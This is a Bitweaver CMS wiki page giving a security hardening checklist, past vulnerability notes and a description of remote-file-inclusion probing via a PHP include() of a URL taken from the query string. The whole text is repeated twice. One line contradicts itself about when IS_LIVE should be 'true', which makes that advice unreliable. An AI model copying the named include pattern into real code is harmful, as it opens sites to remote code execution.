History of Security
{maketoc}
! Bitweaver 2
!! Security settings
After you installed bitweaver, check the following settings:
* In /kernel/config_inc.php the parameter IS_LIVE should be "true" (it's "true" by default). From then on, error messages are not exposed to visitors anymore. To see the errors yourself, either monitor your error logs directly from the server, or set IS_LIVE to "true" only while testing and developing (while having other protection in place).
* Rename your /install/ directory. Rename it back only to install new packages.
* In Admin > Users > Permissions, make sure that ''Anonymous'' is not allowed to attach files to content (not allowed by default)
* If users are allowed to input HTML, enable HTMLPurifier, which strips malicious code.
* If ''Anonymous'' can submit content, enable CAPTCHA (depends on your server's setup).
!! Security issues
!!! wiki_url_import
The "suck_url Information Disclosure" security issue has been fixed in version 2.1. Before, it was exploitable when the admin turned on the feature ''wiki_url_import'' (off by default).
!!! Hacking attempts
The script kiddie plague du jour is the idea to exploit code that does: include($varWithSomeUrlFromGetString); which would execute remotely written PHP. If such an attack is attemped, a bitweaver install might mail an error message to you, the admin, alerting something like "unknown column" or "unknown sort order" (note that normal users browsing your pages will never see any error message unless you set IS_LIVE to ''false'' in /kernel/config_inc.php). The error mail informs you that the attemptet hack failed (that it didn't do anything).
!! 3rd party applications
!!! PHP security settings
* For security reasons, your server might run PHP with features like open_basedir or safe_mode switched ON. See ((Install under safe mode)).
! Bitweaver 1.3
Bitweaver versions 1.3 and before were released in 2004/2005 (see ((bitweaverRoadMap|Roadmap))). These versions are not supported anymore, i.e., the code hasn't been updated since the release. There are a couple of serious security issues. Some stem from 3rd party code, like left-over code from older versions or the infamous Xmlrpc bug (if enabled). Many of the improvements introduced with bitweaver 2 addressed these issues specifically. In other words, don't install version 1.3 anymore. If you're running version 1.3 and are concerned about security, please ((bitweaver R1 to R2 Upgrade|upgrade bitweaver)).
! Bitweaver 2
!! Security settings
After you installed bitweaver, check the following settings:
* In /kernel/config_inc.php the parameter IS_LIVE should be "true" (it's "true" by default). From then on, error messages are not exposed to visitors anymore. To see the errors yourself, either monitor your error logs directly from the server, or set IS_LIVE to "true" only while testing and developing (while having other protection in place).
* Rename your /install/ directory. Rename it back only to install new packages.
* In Admin > Users > Permissions, make sure that ''Anonymous'' is not allowed to attach files to content (not allowed by default)
* If users are allowed to input HTML, enable HTMLPurifier, which strips malicious code.
* If ''Anonymous'' can submit content, enable CAPTCHA (depends on your server's setup).
!! Security issues
!!! wiki_url_import
The "suck_url Information Disclosure" security issue has been fixed in version 2.1. Before, it was exploitable when the admin turned on the feature ''wiki_url_import'' (off by default).
!!! Hacking attempts
The script kiddie plague du jour is the idea to exploit code that does: include($varWithSomeUrlFromGetString); which would execute remotely written PHP. If such an attack is attemped, a bitweaver install might mail an error message to you, the admin, alerting something like "unknown column" or "unknown sort order" (note that normal users browsing your pages will never see any error message unless you set IS_LIVE to ''false'' in /kernel/config_inc.php). The error mail informs you that the attemptet hack failed (that it didn't do anything).
!! 3rd party applications
!!! PHP security settings
* For security reasons, your server might run PHP with features like open_basedir or safe_mode switched ON. See ((Install under safe mode)).
! Bitweaver 1.3
Bitweaver versions 1.3 and before were released in 2004/2005 (see ((bitweaverRoadMap|Roadmap))). These versions are not supported anymore, i.e., the code hasn't been updated since the release. There are a couple of serious security issues. Some stem from 3rd party code, like left-over code from older versions or the infamous Xmlrpc bug (if enabled). Many of the improvements introduced with bitweaver 2 addressed these issues specifically. In other words, don't install version 1.3 anymore. If you're running version 1.3 and are concerned about security, please ((bitweaver R1 to R2 Upgrade|upgrade bitweaver)).